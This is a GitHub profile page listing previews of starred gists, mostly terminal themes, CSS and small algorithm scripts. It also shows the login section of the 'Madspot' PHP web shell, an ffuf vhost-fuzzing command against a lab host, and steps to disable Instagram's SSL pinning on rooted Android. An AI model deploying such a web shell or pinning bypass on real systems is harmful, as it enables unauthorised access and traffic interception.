Skip to content

Instantly share code, notes, and snippets.

View joaostack's full-sized avatar
🎯
Focusing

João Henryque joaostack

🎯
Focusing
View GitHub Profile
@deverebor
deverebor / README.md
Last active February 23, 2026 01:58
Starship theme

Preview

image

@shollingsworth
shollingsworth / vhost_scan_ffuf.sh
Created February 10, 2022 01:56
vhost scan ffuf
ffuf -u http://hackfail.htb/ -H "Host: FUZZ.hackfail.htb" -w "$(wl)" -timeout 100 -t 1 -fs 10676
@tiffany352
tiffany352 / SynthWave 84.json
Created September 6, 2020 19:58
I ported the SynthWave 84 color scheme to work in the Windows Terminal
{
"name": "SynthWave 84",
"background": "#262335",
"foreground": "#ffffff",
"white": "#ffffff",
"brightWhite": "#ffffff",
"black": "#000000",
"brightBlack": "#888888",
"blue": "#03edf9",
"brightBlue": "#03edf9",
@privatesh3ll
privatesh3ll / madspot.php
Created November 22, 2019 12:39
madspot.php - Madspot Shell
<?php session_start();
$password = "under"; // sifre(degistirebilirsiniz)
$pass = $_POST['pass'];
$form = "<form method='POST'>
<input type='password' name='pass'><input type='submit' value='Login !'>
</form>";
if( !isset($_SESSION['sec']) ){ $_SESSION['sec'] = false;
} if(isset($pass)) { if($pass == $password) { $_SESSION['sec'] = true;
} else { die( "{$form} <br> <H1>Error");
} } if(!$_SESSION['sec']): echo $form;
@davialexandre
davialexandre / gruvbox_dark.json
Created June 23, 2019 18:09
Gruvbox Dark color scheme for the new Windows Terminal
{
"background" : "#282828",
"black" : "#282828",
"blue" : "#458588",
"brightBlack" : "#928374",
"brightBlue" : "#83A598",
"brightCyan" : "#8EC07C",
"brightGreen" : "#B8BB26",
"brightPurple" : "#D3869B",
"brightRed" : "#FB4934",
@liamcottle
liamcottle / README.md
Last active March 3, 2026 23:09
Disable SSL Pinning on Instagram for Android

Disable SSL Pinning on Instagram for Android

Create the file /data/data/com.instagram.android/shared_prefs/devprefs.xml and add the following content. (You will need root access to modify it)

<?xml version='1.0' encoding='utf-8' standalone='yes' ?>
<map>
    <string name="debug_allow_user_certs_ttl">1557909551442:86400000</string>
    <boolean name="debug_allow_user_certs" value="true" />
    <boolean name="debug_disable_liger_fizz" value="true" />
@donysukardi
donysukardi / custom.css
Last active October 24, 2025 01:44
Rounded VS Code Tabs
.tabs-container {
padding-left: 22px;
}
.tabs-container > .tab {
transform: skewX(25deg);
border-radius: 5px 5px 0 0;
height: 28px;
}
@demersdesigns
demersdesigns / craft-popular-urls
Last active March 4, 2026 08:50
A list of the 100 most popular website URLs for import into Craft from InVision. http://invisionapp.com/craft Content generated from https://en.wikipedia.org/wiki/List_of_most_popular_websites
@samueltcsantos
samueltcsantos / alg009.py
Created May 8, 2014 01:02
Algoritmo para calcular a Velocidade Média
# -*- coding:utf-8 -*-
#------------------------------------------
# Autor: Samuel T. C. Santos
# Data: 07/05/2014
# python version-2.x
#------------------------------------------
distancia = raw_input("Distancia [km]? ")
tempo = raw_input("Tempo [hr]? ")
@AnthonyDiGirolamo
AnthonyDiGirolamo / calc.c
Created August 29, 2011 19:48
shunting yard algorithm in c
#include <stdio.h>
#include <stdlib.h>
#include <ctype.h>
#include <math.h>
#define CHECKMALLOC(var) if((var) == NULL) {printf("ERROR: malloc\n");abort();}
#define MAXOPSTACK 64
#define MAXNUMSTACK 64